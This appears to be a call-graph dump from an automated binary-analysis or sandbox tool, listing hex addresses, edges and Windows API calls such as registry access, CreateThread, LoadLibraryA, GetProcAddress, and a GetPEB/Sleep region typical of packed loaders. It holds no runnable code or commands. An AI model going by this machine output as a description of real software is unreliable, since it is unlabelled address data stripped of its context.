94530 9387c8 94527->94530 94540 8cf3f2 94527->94540 94571 8cf431 Mailbox 94527->94571 94528 8cf595 94536 8cd7f7 48 API calls 94528->94536 94528->94571 94531 938728 94529->94531 94682 90cc5c 86 API calls 4 library calls 94530->94682 94531->94534 94679 90cc5c 86 API calls 4 library calls 94531->94679 94532 8cfe30 335 API calls 94532->94571 94534->94527 94534->94528 94537 8cd7f7 48 API calls 94534->94537 94569 8cf229 94534->94569 94538 9387a3 94536->94538 94542 938772 94537->94542 94681 8e0f0a 52 API calls __cinit 94538->94681 94566 8cf418 94540->94566 94683 909af1 48 API calls 94540->94683 94541 938b1b 94556 938bcf 94541->94556 94557 938b2c 94541->94557 94680 8e0f0a 52 API calls __cinit 94542->94680 94544 8cf770 94549 938a45 94544->94549 94567 8cf77a 94544->94567 94546 8cd6e9 55 API calls 94546->94571 94547 938c53 94697 90cc5c 86 API calls 4 library calls 94547->94697 94548 938810 94684 91eef8 335 API calls 94548->94684 94689 8dc1af 48 API calls 94549->94689 94550 8cfe30 335 API calls 94570 8cf6aa 94550->94570 94551 90cc5c 86 API calls 94551->94571 94552 938b7e 94692 91e40a 335 API calls Mailbox 94552->94692 94694 90cc5c 86 API calls 4 library calls 94556->94694 94691 91f5ee 335 API calls 94557->94691 94558 938beb 94695 91bdbd 335 API calls Mailbox 94558->94695 94561 8d1b90 48 API calls 94561->94571 94563 8d1b90 48 API calls 94563->94571 94566->94541 94566->94570 94566->94571 94567->94561 94568 938c00 94589 8cf537 Mailbox 94568->94589 94696 90cc5c 86 API calls 4 library calls 94568->94696 94569->94527 94569->94528 94569->94566 94569->94571 94570->94544 94570->94550 94570->94571 94573 8cfce0 94570->94573 94570->94589 94571->94532 94571->94546 94571->94547 94571->94551 94571->94552 94571->94558 94571->94563 94571->94573 94571->94589 94678 8cdd47 48 API calls ___crtGetEnvironmentStringsW 94571->94678 94690 8f97ed InterlockedDecrement 94571->94690 94698 8dc1af 48 API calls 94571->94698 94572 938823 94572->94566 94575 93884b 94572->94575 94573->94589 94693 90cc5c 86 API calls 4 library calls 94573->94693 94685 91ccdc 48 API calls 94575->94685 94579 938857 94581 938865 94579->94581 94582 9388aa 94579->94582 94686 909b72 48 API calls 94581->94686 94585 9388a0 Mailbox 94582->94585 94687 90a69d 48 API calls 94582->94687 94583 8cfe30 335 API calls 94583->94589 94585->94583 94587 9388e7 94688 8cbc74 48 API calls 94587->94688 94589->93510 94591 8d479f 94590->94591 94592 8d4637 94590->94592 94593 8cce19 48 API calls 94591->94593 94594 936e05 94592->94594 94595 8d4643 94592->94595 94602 8d46e4 Mailbox 94593->94602 94753 91e822 94594->94753 94752 8d4300 335 API calls ___crtGetEnvironmentStringsW 94595->94752 94598 936e11 94599 8d4739 Mailbox 94598->94599 94793 90cc5c 86 API calls 4 library calls 94598->94793 94599->93510 94601 8d4659 94601->94598 94601->94599 94601->94602 94606 8c4252 84 API calls 94602->94606 94699 916ff0 94602->94699 94708 906524 94602->94708 94711 90fa0c 94602->94711 94606->94599 94607->93510 94928 8cbd30 94608->94928 94610 8d3267 94622 8d3313 Mailbox ___crtGetEnvironmentStringsW 94610->94622 94940 8dc36b 86 API calls 94610->94940 94612 8dc3c3 48 API calls 94612->94622 94615 8cd645 53 API calls 94615->94622 94617 8cd6e9 55 API calls 94617->94622 94621 8cfe30 335 API calls 94621->94622 94622->94612 94622->94615 94622->94617 94622->94621 94624 90cc5c 86 API calls 94622->94624 94626 8ce8d0 335 API calls 94622->94626 94628 8dc2d6 48 API calls 94622->94628 94629 8c6eed 48 API calls 94622->94629 94631 8df4ea 48 API calls 94622->94631 94632 8cdcae 50 API calls 94622->94632 94633 8d3635 Mailbox 94622->94633 94933 8c2b7a 94622->94933 94941 8cd9a0 53 API calls __cinit 94622->94941 94942 8cd8c0 53 API calls 94622->94942 94943 91f320 335 API calls 94622->94943 94944 91f5ee 335 API calls 94622->94944 94945 8c1caa 49 API calls 94622->94945 94946 91cda2 82 API calls Mailbox 94622->94946 94947 9080e3 53 API calls 94622->94947 94948 8cd764 55 API calls 94622->94948 94949 90c942 50 API calls 94622->94949 94624->94622 94626->94622 94628->94622 94629->94622 94631->94622 94632->94622 94633->93510 94634->93510 94635->93510 94636->93454 94637->93457 94638->93462 94639->93510 94640->93510 94641->93504 94642->93504 94643->93504 94645 8cfe50 94644->94645 94669 8cfe7e 94644->94669 94646 8df4ea 48 API calls 94645->94646 94646->94669 94647 8d146e 94648 8c6eed 48 API calls 94647->94648 94670 8cffe1 94648->94670 94650 8d0509 94956 90cc5c 86 API calls 4 library calls 94650->94956 94652 8df4ea 48 API calls 94652->94669 94654 8c6eed 48 API calls 94654->94669 94655 93a246 94658 8c6eed 48 API calls 94655->94658 94656 93a922 94656->93510 94657 8d1473 94955 90cc5c 86 API calls 4 library calls 94657->94955 94658->94670 94661 93a873 94661->93510 94662 8cd7f7 48 API calls 94662->94669 94663 8f97ed InterlockedDecrement 94663->94669 94664 93a30e 94664->94670 94953 8f97ed InterlockedDecrement 94664->94953 94665 8e0f0a 52 API calls __cinit 94665->94669 94667 93a973 94957 90cc5c 86 API calls 4 library calls 94667->94957 94669->94647 94669->94650 94669->94652 94669->94654 94669->94655 94669->94657 94669->94662 94669->94663 94669->94664 94669->94665 94669->94667 94669->94670 94672 8d15b5 94669->94672 94951 8d1820 335 API calls 2 library calls 94669->94951 94952 8d1d10 59 API calls Mailbox 94669->94952 94670->93510 94671 93a982 94954 90cc5c 86 API calls 4 library calls 94672->94954 94673->93504 94674->93504 94675->93504 94676->94522 94677->94524 94678->94571 94679->94534 94680->94569 94681->94571 94682->94589 94683->94548 94684->94572 94685->94579 94686->94585 94687->94587 94688->94585 94689->94571 94690->94571 94691->94571 94692->94573 94693->94589 94694->94589 94695->94568 94696->94589 94697->94589 94698->94571 94794 8c936c 94699->94794 94701 91702a 94702 8cb470 91 API calls 94701->94702 94704 91703a 94702->94704 94703 91705f 94707 917063 94703->94707 94814 8ccdb9 48 API calls 94703->94814 94704->94703 94705 8cfe30 335 API calls 94704->94705 94705->94703 94707->94599 94817 906ca9 GetFileAttributesW 94708->94817 94712 90fa1c __ftell_nolock 94711->94712 94713 90fa44 94712->94713 94882 8cd286 48 API calls 94712->94882 94715 8c936c 81 API calls 94713->94715 94716 90fa5e 94715->94716 94717 90fa80 94716->94717 94718 90fb68 94716->94718 94730 90fb92 94716->94730 94719 8c936c 81 API calls 94717->94719 94720 8c41a9 136 API calls 94718->94720 94721 90fa8c _wcscpy _wcschr 94719->94721 94722 90fb79 94720->94722 94731 90fab0 _wcscat _wcscpy 94721->94731 94735 90fade _wcscat 94721->94735 94723 8c41a9 136 API calls 94722->94723 94725 90fb8e 94722->94725 94723->94725 94724 8c936c 81 API calls 94726 90fbc7 94724->94726 94725->94724 94725->94730 94727 8e1dfc __wsplitpath 47 API calls 94726->94727 94736 90fbeb _wcscat _wcscpy 94727->94736 94728 8c936c 81 API calls 94729 90fafc _wcscpy 94728->94729 94883 9072cb GetFileAttributesW 94729->94883 94730->94599 94733 8c936c 81 API calls 94731->94733 94733->94735 94734 90fb1c __wsetenvp 94734->94730 94737 8c936c 81 API calls 94734->94737 94735->94728 94739 8c936c 81 API calls 94736->94739 94738 90fb48 94737->94738 94884 9060dd 77 API calls 4 library calls 94738->94884 94741 90fc82 94739->94741 94821 90690b 94741->94821 94742 90fb5c 94742->94730 94744 90fca2 94745 906524 3 API calls 94744->94745 94746 90fcb1 94745->94746 94747 8c936c 81 API calls 94746->94747 94751 90fce2 94746->94751 94748 90fccb 94747->94748 94827 90bfa4 94748->94827 94750 8c4252 84 API calls 94750->94730 94751->94750 94752->94601 94754 91e868 94753->94754 94755 91e84e 94753->94755 94921 91ccdc 48 API calls 94754->94921 94920 90cc5c 86 API calls 4 library calls 94755->94920 94758 91e871 94759 8cfe30 334 API calls 94758->94759 94760 91e8cf 94759->94760 94761 91e96a 94760->94761 94763 91e916 94760->94763 94792 91e860 Mailbox 94760->94792 94762 91e978 94761->94762 94767 91e9c7 94761->94767 94923 90a69d 48 API calls 94762->94923 94922 909b72 48 API calls 94763->94922 94766 91e949 94769 8d45e0 334 API calls 94766->94769 94770 8c936c 81 API calls 94767->94770 94767->94792 94768 91e99b 94924 8cbc74 48 API calls 94768->94924 94769->94792 94771 91e9e1 94770->94771 94773 8cbdfa 48 API calls 94771->94773 94775 91ea05 CharUpperBuffW 94773->94775 94774 91e9a3 Mailbox 94777 8d3200 334 API calls 94774->94777 94776 91ea1f 94775->94776 94778 91ea72 94776->94778 94779 91ea26 94776->94779 94777->94792 94780 8c936c 81 API calls 94778->94780 94925 909b72 48 API calls 94779->94925 94781 91ea7a 94780->94781 94926 8c1caa 49 API calls 94781->94926 94784 91ea54 94785 8d45e0 334 API calls 94784->94785 94785->94792 94786 91ea84 94787 8c936c 81 API calls 94786->94787 94786->94792 94788 91ea9f 94787->94788 94927 8cbc74 48 API calls 94788->94927 94790 91eaaf 94791 8d3200 334 API calls 94790->94791 94791->94792 94792->94598 94793->94599 94795 8c9384 94794->94795 94796 8c9380 94794->94796 94797 934cbd __i64tow 94795->94797 94798 8c9398 94795->94798 94799 934bbf 94795->94799 94806 8c93b0 __itow Mailbox _wcscpy 94795->94806 94796->94701 94815 8e172b 80 API calls 3 library calls 94798->94815 94800 934ca5 94799->94800 94801 934bc8 94799->94801 94816 8e172b 80 API calls 3 library calls 94800->94816 94801->94806 94807 934be7 94801->94807 94803 8df4ea 48 API calls 94805 8c93ba 94803->94805 94805->94796 94808 8cce19 48 API calls 94805->94808 94806->94803 94809 8df4ea 48 API calls 94807->94809 94808->94796 94810 934c04 94809->94810 94811 8df4ea 48 API calls 94810->94811 94812 934c2a 94811->94812 94812->94796 94813 8cce19 48 API calls 94812->94813 94813->94796 94814->94707 94815->94806 94816->94806 94818 906529 94817->94818 94819 906cc4 FindFirstFileW 94817->94819 94818->94599 94819->94818 94820 906cd9 FindClose 94819->94820 94820->94818 94822 906918 _wcschr __ftell_nolock 94821->94822 94823 8e1dfc __wsplitpath 47 API calls 94822->94823 94826 90692e _wcscat _wcscpy 94822->94826 94824 90695d 94823->94824 94825 8e1dfc __wsplitpath 47 API calls 94824->94825 94825->94826 94826->94744 94828 90bfb1 __ftell_nolock 94827->94828 94829 8df4ea 48 API calls 94828->94829 94830 90c00e 94829->94830 94831 8c47b7 48 API calls 94830->94831 94832 90c018 94831->94832 94833 90bdb4 GetSystemTimeAsFileTime 94832->94833 94834 90c023 94833->94834 94835 8c4517 83 API calls 94834->94835 94836 90c036 _wcscmp 94835->94836 94837 90c107 94836->94837 94838 90c05a 94836->94838 94839 90c56d 94 API calls 94837->94839 94840 90c56d 94 API calls 94838->94840 94856 90c0d3 _wcscat 94839->94856 94841 90c05f 94840->94841 94842 8e1dfc __wsplitpath 47 API calls 94841->94842 94844 90c110 94841->94844 94847 90c088 _wcscat _wcscpy 94842->94847 94843 8c44ed 64 API calls 94845 90c12c 94843->94845 94844->94751 94846 8c44ed 64 API calls 94845->94846 94848 90c13c 94846->94848 94850 8e1dfc __wsplitpath 47 API calls 94847->94850 94849 8c44ed 64 API calls 94848->94849 94851 90c157 94849->94851 94850->94856 94852 8c44ed 64 API calls 94851->94852 94853 90c167 94852->94853 94854 8c44ed 64 API calls 94853->94854 94855 90c182 94854->94855 94857 8c44ed 64 API calls 94855->94857 94856->94843 94856->94844 94882->94713 94883->94734 94884->94742 94920->94792 94921->94758 94922->94766 94923->94768 94924->94774 94925->94784 94926->94786 94927->94790 94929 8cbd3f 94928->94929 94932 8cbd5a 94928->94932 94930 8cbdfa 48 API calls 94929->94930 94931 8cbd47 CharUpperBuffW 94930->94931 94931->94932 94932->94610 94934 8c2b8b 94933->94934 94935 93436a 94933->94935 94936 8df4ea 48 API calls 94934->94936 94937 8c2b92 94936->94937 94938 8c2bb3 94937->94938 94950 8c2bce 48 API calls 94937->94950 94938->94622 94940->94622 94941->94622 94942->94622 94943->94622 94944->94622 94945->94622 94946->94622 94947->94622 94948->94622 94949->94622 94950->94938 94951->94669 94952->94669 94953->94670 94954->94670 94955->94661 94956->94656 94957->94671 94959 8c513f __wsetenvp 94958->94959 94960 931b27 94959->94960 94961 8c5151 94959->94961 94963 8c6b4a 48 API calls 94960->94963 94962 8cbb85 48 API calls 94961->94962 94964 8c515e ___crtGetEnvironmentStringsW 94962->94964 94965 931b34 94963->94965 94964->93533 94966 8dee75 48 API calls 94965->94966 94967 931b57 ___crtGetEnvironmentStringsW 94966->94967 94969 8cb392 94968->94969 94976 8cb3c5 ___crtGetEnvironmentStringsW 94968->94976 94970 8cb3fd 94969->94970 94971 8cb3b8 94969->94971 94969->94976 94972 8df4ea 48 API calls 94970->94972 94973 8cbb85 48 API calls 94971->94973 94974 8cb407 94972->94974 94973->94976 94975 8df4ea 48 API calls 94974->94975 94975->94976 94976->93542 94977->93543 94978 939c06 94989 8dd3be 94978->94989 94980 939c1c 94988 939c91 Mailbox 94980->94988 94998 8c1caa 49 API calls 94980->94998 94982 8d3200 335 API calls 94984 939cc5 94982->94984 94986 93a7ab Mailbox 94984->94986 95000 90cc5c 86 API calls 4 library calls 94984->95000 94985 939c71 94985->94984 94999 90b171 48 API calls 94985->94999 94988->94982 94990 8dd3dc 94989->94990 94991 8dd3ca 94989->94991 94993 8dd40b 94990->94993 94994 8dd3e2 94990->94994 95001 8cdcae 50 API calls Mailbox 94991->95001 95002 8cdcae 50 API calls Mailbox 94993->95002 94996 8df4ea 48 API calls 94994->94996 94997 8dd3d4 94996->94997 94997->94980 94998->94985 94999->94988 95000->94986 95001->94997 95002->94997 95003 9319cb 95008 8c2322 95003->95008 95005 9319d1 95041 8e0f0a 52 API calls __cinit 95005->95041 95007 9319db 95009 8c2344 95008->95009 95042 8c26df 95009->95042 95014 8cd7f7 48 API calls 95015 8c2384 95014->95015 95016 8cd7f7 48 API calls 95015->95016 95017 8c238e 95016->95017 95018 8cd7f7 48 API calls 95017->95018 95019 8c2398 95018->95019 95020 8cd7f7 48 API calls 95019->95020 95021 8c23de 95020->95021 95022 8cd7f7 48 API calls 95021->95022 95023 8c24c1 95022->95023 95050 8c263f 95023->95050 95027 8c24f1 95028 8cd7f7 48 API calls 95027->95028 95029 8c24fb 95028->95029 95079 8c2745 95029->95079 95031 8c2546 95032 8c2556 GetStdHandle 95031->95032 95033 8c25b1 95032->95033 95034 93501d 95032->95034 95035 8c25b7 CoInitialize 95033->95035 95034->95033 95036 935026 95034->95036 95035->95005 95086 9092d4 53 API calls 95036->95086 95038 93502d 95087 9099f9 CreateThread 95038->95087 95040 935039 CloseHandle 95040->95035 95041->95007 95088 8c2854 95042->95088 95045 8c6a63 48 API calls 95046 8c234a 95045->95046 95047 8c272e 95046->95047 95102 8c27ec 6 API calls 95047->95102 95049 8c237a 95049->95014 95051 8cd7f7 48 API calls 95050->95051 95052 8c264f 95051->95052 95053 8cd7f7 48 API calls 95052->95053 95054 8c2657 95053->95054 95103 8c26a7 95054->95103 95057 8c26a7 48 API calls 95058 8c2667 95057->95058 95059 8cd7f7 48 API calls 95058->95059 95060 8c2672 95059->95060 95061 8df4ea 48 API calls 95060->95061 95062 8c24cb 95061->95062 95063 8c22a4 95062->95063 95064 8c22b2 95063->95064 95065 8cd7f7 48 API calls 95064->95065 95066 8c22bd 95065->95066 95067 8cd7f7 48 API calls 95066->95067 95068 8c22c8 95067->95068 95069 8cd7f7 48 API calls 95068->95069 95070 8c22d3 95069->95070 95071 8cd7f7 48 API calls 95070->95071 95072 8c22de 95071->95072 95073 8c26a7 48 API calls 95072->95073 95074 8c22e9 95073->95074 95075 8df4ea 48 API calls 95074->95075 95076 8c22f0 95075->95076 95077 931fe7 95076->95077 95078 8c22f9 RegisterWindowMessageW 95076->95078 95078->95027 95080 8c2755 95079->95080 95081 935f4d 95079->95081 95083 8df4ea 48 API calls 95080->95083 95108 90c942 50 API calls 95081->95108 95085 8c275d 95083->95085 95084 935f58 95085->95031 95086->95038 95087->95040 95109 9099df 54 API calls 95087->95109 95095 8c2870 95088->95095 95091 8c2870 48 API calls 95092 8c2864 95091->95092 95093 8cd7f7 48 API calls 95092->95093 95094 8c2716 95093->95094 95094->95045 95096 8cd7f7 48 API calls 95095->95096 95097 8c287b 95096->95097 95098 8cd7f7 48 API calls 95097->95098 95099 8c2883 95098->95099 95100 8cd7f7 48 API calls 95099->95100 95101 8c285c 95100->95101 95101->95091 95102->95049 95104 8cd7f7 48 API calls 95103->95104 95105 8c26b0 95104->95105 95106 8cd7f7 48 API calls 95105->95106 95107 8c265f 95106->95107 95107->95057 95108->95084 95110 93197b 95115 8ddd94 95110->95115 95114 93198a 95116 8df4ea 48 API calls 95115->95116 95117 8ddd9c 95116->95117 95118 8dddb0 95117->95118 95123 8ddf3d 95117->95123 95122 8e0f0a 52 API calls __cinit 95118->95122 95122->95114 95124 8ddda8 95123->95124 95125 8ddf46 95123->95125 95127 8dddc0 95124->95127 95155 8e0f0a 52 API calls __cinit 95125->95155 95128 8cd7f7 48 API calls 95127->95128 95129 8dddd7 GetVersionExW 95128->95129 95130 8c6a63 48 API calls 95129->95130 95131 8dde1a 95130->95131 95156 8ddfb4 95131->95156 95134 8c6571 48 API calls 95135 8dde2e 95134->95135 95136 9324c8 95135->95136 95160 8ddf77 95135->95160 95139 8ddea4 GetCurrentProcess 95169 8ddf5f LoadLibraryA GetProcAddress 95139->95169 95140 8ddebb 95142 8ddf31 GetSystemInfo 95140->95142 95143 8ddee3 95140->95143 95145 8ddf0e 95142->95145 95163 8de00c 95143->95163 95147 8ddf1c FreeLibrary 95145->95147 95148 8ddf21 95145->95148 95147->95148 95148->95118 95149 8ddf29 GetSystemInfo 95152 8ddf03 95149->95152 95150 8ddef9 95166 8ddff4 95150->95166 95152->95145 95154 8ddf09 FreeLibrary 95152->95154 95154->95145 95155->95124 95157 8ddfbd 95156->95157 95158 8cb18b 48 API calls 95157->95158 95159 8dde22 95158->95159 95159->95134 95170 8ddf89 95160->95170 95174 8de01e 95163->95174 95167 8de00c 2 API calls 95166->95167 95168 8ddf01 GetNativeSystemInfo 95167->95168 95168->95152 95169->95140 95171 8ddea0 95170->95171 95172 8ddf92 LoadLibraryA 95170->95172 95171->95139 95171->95140 95172->95171 95173 8ddfa3 GetProcAddress 95172->95173 95173->95171 95175 8ddef1 95174->95175 95176 8de027 LoadLibraryA 95174->95176 95175->95149 95175->95150 95176->95175 95177 8de038 GetProcAddress 95176->95177 95177->95175 95178 9319ba 95183 8dc75a 95178->95183 95182 9319c9 95184 8cd7f7 48 API calls 95183->95184 95185 8dc7c8 95184->95185 95191 8dd26c 95185->95191 95187 8dc865 95188 8dc881 95187->95188 95194 8dd1fa 48 API calls ___crtGetEnvironmentStringsW 95187->95194 95190 8e0f0a 52 API calls __cinit 95188->95190 95190->95182 95195 8dd298 95191->95195 95194->95187 95196 8dd28b 95195->95196 95197 8dd2a5 95195->95197 95196->95187 95197->95196 95198 8dd2ac RegOpenKeyExW 95197->95198 95198->95196 95199 8dd2c6 RegQueryValueExW 95198->95199 95200 8dd2fc RegCloseKey 95199->95200 95201 8dd2e7 95199->95201 95200->95196 95201->95200 95202 938eb8 95206 90a635 95202->95206 95204 938ec3 95205 90a635 84 API calls 95204->95205 95205->95204 95212 90a66f 95206->95212 95213 90a642 95206->95213 95207 90a671 95218 8dec4e 81 API calls 95207->95218 95209 90a676 95210 8c936c 81 API calls 95209->95210 95211 90a67d 95210->95211 95214 8c510d 48 API calls 95211->95214 95212->95204 95213->95207 95213->95209 95213->95212 95215 90a669 95213->95215 95214->95212 95217 8d4525 61 API calls ___crtGetEnvironmentStringsW 95215->95217 95217->95212 95218->95209 95219 11b5030 95233 11b2c80 95219->95233 95221 11b50b2 95236 11b4f20 95221->95236 95239 11b60e0 GetPEB 95233->95239 95235 11b330b 95235->95221 95237 11b4f29 Sleep 95236->95237 95238 11b4f37 95237->95238 95240 11b610a 95239->95240 95240->95235 95241 8cef80 95244 8d3b70 95241->95244 95243 8cef8c 95245 8d3bc8 95244->95245 95268 8d42a5 95244->95268 95246 8d3bef 95245->95246 95248 936fd1 95245->95248 95251 936f7e 95245->95251 95257 936f9b 95245->95257 95247 8df4ea 48 API calls 95246->95247 95249 8d3c18 95247->95249 95324 91ceca 335 API calls Mailbox 95248->95324 95252 8df4ea 48 API calls 95249->95252 95251->95246 95253 936f87 95251->95253 95300 8d3c2c __wsetenvp ___crtGetEnvironmentStringsW 95252->95300 95321 91d552 335 API calls Mailbox 95253->95321 95254 936fbe 95323 90cc5c 86 API calls 4 library calls 95254->95323 95257->95254 95322 91da0e 335 API calls 2 library calls 95257->95322 95258 8d42f2 95343 90cc5c 86 API calls 4 library calls 95258->95343 95261 9373b0 95261->95243 95262 937297 95332 90cc5c 86 API calls 4 library calls 95262->95332 95263 93737a 95342 90cc5c 86 API calls 4 library calls 95263->95342 95265 8ddce0 53 API calls 95265->95300 95336 90cc5c 86 API calls 4 library calls 95268->95336 95270 93707e 95325 90cc5c 86 API calls 4 library calls 95270->95325 95272 8d40df 95333 90cc5c 86 API calls 4 library calls 95272->95333 95273 8cd6e9 55 API calls 95273->95300 95276 8cd645 53 API calls 95276->95300 95279 9372d2 95334 90cc5c 86 API calls 4 library calls 95279->95334 95281 8cfe30 335 API calls 95281->95300 95283 937350 95340 90cc5c 86 API calls 4 library calls 95283->95340 95284 9372e9 95335 90cc5c 86 API calls 4 library calls 95284->95335 95285 937363 95341 90cc5c 86 API calls 4 library calls 95285->95341 95289 8c6a63 48 API calls 95289->95300 95291 8dc050 48 API calls 95291->95300 95292 93714c 95329 91ccdc 48 API calls 95292->95329 95293 8df4ea 48 API calls 95293->95300 95295 93733f 95339 90cc5c 86 API calls 4 library calls 95295->95339 95296 8c6eed 48 API calls 95296->95300 95298 8cd286 48 API calls 95298->95300 95300->95258 95300->95262 95300->95263 95300->95265 95300->95268 95300->95270 95300->95272 95300->95273 95300->95276 95300->95279 95300->95281 95300->95283 95300->95284 95300->95285 95300->95289 95300->95291 95300->95292 95300->95293 95300->95295 95300->95296 95300->95298 95301 8d3f2b 95300->95301 95302 9371e1 95300->95302 95304 8dee75 48 API calls 95300->95304 95316 8cd9a0 53 API calls __cinit 95300->95316 95317 8cd83d 53 API calls 95300->95317 95318 8ccdb9 48 API calls 95300->95318 95319 8dc15c 48 API calls 95300->95319 95320 8dbecb 335 API calls 95300->95320 95326 8cdcae 50 API calls Mailbox 95300->95326 95327 91ccdc 48 API calls 95300->95327 95328 90a1eb 50 API calls 95300->95328 95301->95243 95302->95301 95338 90cc5c 86 API calls 4 library calls 95302->95338 95303 93715f 95313 9371a1 95303->95313 95330 91ccdc 48 API calls 95303->95330 95304->95300 95309 9371ce 95310 8dc050 48 API calls 95309->95310 95312 9371d6 95310->95312 95311 9371ab 95311->95268 95311->95309 95312->95302 95314 937313 95312->95314 95331 8dc15c 48 API calls 95313->95331 95337 90cc5c 86 API calls 4 library calls 95314->95337 95316->95300 95317->95300 95318->95300 95319->95300 95320->95300 95321->95301 95322->95254 95323->95248 95324->95300 95325->95301 95326->95300 95327->95300 95328->95300 95329->95303 95330->95303 95331->95311 95332->95272 95333->95301 95334->95284 95335->95301 95336->95301 95337->95301 95338->95301 95339->95301 95340->95301 95341->95301 95342->95301 95343->95261 95344 9319dd 95349 8c4a30 95344->95349 95346 9319f1 95369 8e0f0a 52 API calls __cinit 95346->95369 95348 9319fb 95350 8c4a40 __ftell_nolock 95349->95350 95351 8cd7f7 48 API calls 95350->95351 95352 8c4af6 95351->95352 95353 8c5374 50 API calls 95352->95353 95354 8c4aff 95353->95354 95370 8c363c 95354->95370 95357 8c518c 48 API calls 95358 8c4b18 95357->95358 95359 8c64cf 48 API calls 95358->95359 95360 8c4b29 95359->95360 95361 8cd7f7 48 API calls 95360->95361 95362 8c4b32 95361->95362 95376 8c49fb 95362->95376 95364 8c4b43 Mailbox 95364->95346 95365 8c4b3d _wcscat Mailbox __wsetenvp 95365->95364 95366 8c61a6 48 API calls 95365->95366 95367 8cce19 48 API calls 95365->95367 95368 8c64cf 48 API calls 95365->95368 95366->95365 95367->95365 95368->95365 95369->95348 95371 8c3649 __ftell_nolock 95370->95371 95390 8c366c GetFullPathNameW 95371->95390 95373 8c365a 95374 8c6a63 48 API calls 95373->95374 95375 8c3669 95374->95375 95375->95357 95392 8cbcce 95376->95392 95379 8c4a2b 95379->95365 95380 9341cc RegQueryValueExW 95381 934246 RegCloseKey 95380->95381 95382 9341e5 95380->95382 95383 8df4ea 48 API calls 95382->95383 95384 9341fe 95383->95384 95385 8c47b7 48 API calls 95384->95385 95386 934208 RegQueryValueExW 95385->95386 95387 934224 95386->95387 95388 93423b 95386->95388 95389 8c6a63 48 API calls 95387->95389 95388->95381 95389->95388 95391 8c368a 95390->95391 95391->95373 95393 8cbce8 95392->95393 95397 8c4a0a RegOpenKeyExW 95392->95397 95394 8df4ea 48 API calls 95393->95394 95395 8cbcf2 95394->95395 95396 8dee75 48 API calls 95395->95396 95396->95397 95397->95379 95397->95380 95398 8c3742 95399 8c374b 95398->95399 95400 8c37c8 95399->95400 95401 8c3769 95399->95401 95438 8c37c6 95399->95438 95403 8c37ce 95400->95403 95404 931e00 95400->95404 95405 8c382c PostQuitMessage 95401->95405 95406 8c3776 95401->95406 95402 8c37ab DefWindowProcW 95440 8c37b9 95402->95440 95407 8c37f6 SetTimer RegisterWindowMessageW 95403->95407 95408 8c37d3 95403->95408 95447 8c2ff6 16 API calls 95404->95447 95405->95440 95410 931e88 95406->95410 95411 8c3781 95406->95411 95415 8c381f CreatePopupMenu 95407->95415 95407->95440 95412 931da3 95408->95412 95413 8c37da KillTimer 95408->95413 95452 904ddd 60 API calls _memset 95410->95452 95416 8c3789 95411->95416 95417 8c3836 95411->95417 95420 931da8 95412->95420 95421 931ddc MoveWindow 95412->95421 95443 8c3847 Shell_NotifyIconW _memset 95413->95443 95414 931e27 95448 8de312 335 API calls Mailbox 95414->95448 95415->95440 95424 8c3794 95416->95424 95425 931e6d 95416->95425 95445 8deb83 53 API calls _memset 95417->95445 95427 931dcb SetFocus 95420->95427 95428 931dac 95420->95428 95421->95440 95430 931e58 95424->95430 95435 8c379f 95424->95435 95425->95402 95451 8fa5f3 48 API calls 95425->95451 95426 931e9a 95426->95402 95426->95440 95427->95440 95431 931db5 95428->95431 95428->95435 95429 8c37ed 95444 8c390f DeleteObject DestroyWindow Mailbox 95429->95444 95450 9055bd 70 API calls _memset 95430->95450 95446 8c2ff6 16 API calls 95431->95446 95435->95402 95449 8c3847 Shell_NotifyIconW _memset 95435->95449 95437 8c3845 95437->95440 95438->95402 95441 931e4c 95442 8c4ffc 67 API calls 95441->95442 95442->95438 95443->95429 95444->95440 95445->95437 95446->95440 95447->95414 95448->95435 95449->95441 95450->95437 95451->95438 95452->95426 95453 939bec 95491 8d0ae0 Mailbox ___crtGetEnvironmentStringsW 95453->95491 95455 8df4ea 48 API calls 95455->95491 95458 8df4ea 48 API calls 95482 8cfec8 95458->95482 95460 8d146e 95468 8c6eed 48 API calls 95460->95468 95462 8d0509 95548 90cc5c 86 API calls 4 library calls 95462->95548 95463 8d1473 95547 90cc5c 86 API calls 4 library calls 95463->95547 95465 8c6eed 48 API calls 95465->95482 95467 93a246 95470 8c6eed 48 API calls 95467->95470 95483 8cffe1 Mailbox 95468->95483 95469 93a922 95470->95483 95473 93a873 95474 8f97ed InterlockedDecrement 95474->95482 95475 93a30e 95475->95483 95543 8f97ed InterlockedDecrement 95475->95543 95476 8cd7f7 48 API calls 95476->95482 95477 8cce19 48 API calls 95477->95491 95479 8e0f0a 52 API calls __cinit 95479->95482 95480 93a973 95549 90cc5c 86 API calls 4 library calls 95480->95549 95482->95458 95482->95460 95482->95462 95482->95463 95482->95465 95482->95467 95482->95474 95482->95475 95482->95476 95482->95479 95482->95480 95482->95483 95485 8d15b5 95482->95485 95540 8d1820 335 API calls 2 library calls 95482->95540 95541 8d1d10 59 API calls Mailbox 95482->95541 95484 93a982 95546 90cc5c 86 API calls 4 library calls 95485->95546 95486 91e822 335 API calls 95486->95491 95487 8cfe30 335 API calls 95487->95491 95488 93a706 95544 90cc5c 86 API calls 4 library calls 95488->95544 95490 8d1526 Mailbox 95545 90cc5c 86 API calls 4 library calls 95490->95545 95491->95455 95491->95477 95491->95482 95491->95483 95491->95486 95491->95487 95491->95488 95491->95490 95492 8f97ed InterlockedDecrement 95491->95492 95493 916ff0 335 API calls 95491->95493 95496 920d09 95491->95496 95499 920d1d 95491->95499 95502 91f0ac 95491->95502 95534 90a6ef 95491->95534 95542 91ef61 82 API calls 2 library calls 95491->95542 95492->95491 95493->95491 95550 91f8ae 95496->95550 95498 920d19 95498->95491 95500 91f8ae 129 API calls 95499->95500 95501 920d2d 95500->95501 95501->95491 95503 8cd7f7 48 API calls 95502->95503 95504 91f0c0 95503->95504 95505 8cd7f7 48 API calls 95504->95505 95506 91f0c8 95505->95506 95507 8cd7f7 48 API calls 95506->95507 95508 91f0d0 95507->95508 95509 8c936c 81 API calls 95508->95509 95533 91f0de 95509->95533 95510 8c6a63 48 API calls 95510->95533 95511 91f2cc 95512 91f2f9 Mailbox 95511->95512 95637 8c6b68 48 API calls 95511->95637 95512->95491 95513 91f2b3 95518 8c518c 48 API calls 95513->95518 95515 8cc799 48 API calls 95515->95533 95516 91f2ce 95520 8c518c 48 API calls 95516->95520 95517 8c6eed 48 API calls 95517->95533 95519 91f2c0 95518->95519 95521 8c510d 48 API calls 95519->95521 95522 91f2dd 95520->95522 95521->95511 95524 8c510d 48 API calls 95522->95524 95523 8cbdfa 48 API calls 95526 91f175 CharUpperBuffW 95523->95526 95524->95511 95525 8cbdfa 48 API calls 95527 91f23a CharUpperBuffW 